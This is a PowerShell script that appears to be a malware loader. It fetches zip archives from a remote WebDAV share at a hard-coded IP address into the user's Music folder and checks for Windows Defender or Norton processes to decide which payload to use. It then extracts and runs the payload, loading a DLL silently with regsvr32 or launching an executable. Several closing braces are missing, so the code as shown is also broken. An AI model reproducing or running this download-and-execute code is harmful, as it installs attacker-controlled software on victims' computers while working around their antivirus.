# Define the source WebDAV URL and the destination folder
$sourceWebDAV = "\\159.69.11.30@8080\DavWWWRoot"
$destinationFolder = [System.IO.Path]::Combine($env:USERPROFILE, "Music")
# Define the file names to copy
$antivirusProcesses = @("nortonsecurity.exe", "MsMpEng.exe") # Process names for Norton Security and Windows Defender
$filesToCopy = "load.zip" # Default file to copy
# Check if Windows Defender is running
$defenderRunning = Get-Process -Name "MsMpEng.exe" -ErrorAction SilentlyContinue
# If either Windows Defender or Norton Security is running, copy payload.zip; otherwise, copy load.zip
if ($antivirusProcesses -contains "nortonsecurity.exe" -or $defenderRunning) {
$filesToCopy = "payload.zip"
# Check if the destination folder exists, and create it if necessary
if (-not (Test-Path -Path $destinationFolder -PathType Container)) {
New-Item -Path $destinationFolder -ItemType Directory -Force
# Copy the selected file to the destination folder
$sourceFile = Join-Path -Path $sourceWebDAV -ChildPath $filesToCopy
$destinationFile = Join-Path -Path $destinationFolder -ChildPath $filesToCopy
if (Test-Path -Path $sourceFile -PathType Leaf) {
Copy-Item -Path $sourceFile -Destination $destinationFile -Force
Write-Host "Copied $filesToCopy to $destinationFolder"
# Extract and execute the appropriate file
if ($filesToCopy -eq "payload.zip") {
Expand-Archive -Path $destinationFile -DestinationPath $destinationFolder -Force
$dllFile = Join-Path -Path $destinationFolder -ChildPath "payload.dll"
if (Test-Path -Path $dllFile -PathType Leaf) {
Write-Host "Executing regsvr32 for $dllFile"
Start-Process -FilePath "regsvr32.exe" -ArgumentList "/s $dllFile" -Wait
}
else {
Write-Host "payload.dll not found in the extracted folder."
}
elseif ($filesToCopy -eq "load.zip") {
Expand-Archive -Path $destinationFile -DestinationPath $destinationFolder -Force
$exeFile = Join-Path -Path $destinationFolder -ChildPath "load.exe"
if (Test-Path -Path $exeFile -PathType Leaf) {
Write-Host "Executing $exeFile"
Start-Process -FilePath $exeFile -Wait
}
else {
Write-Host "load.exe not found in the extracted folder."
}
else {
Write-Host "File $filesToCopy does not exist in the source WebDAV location."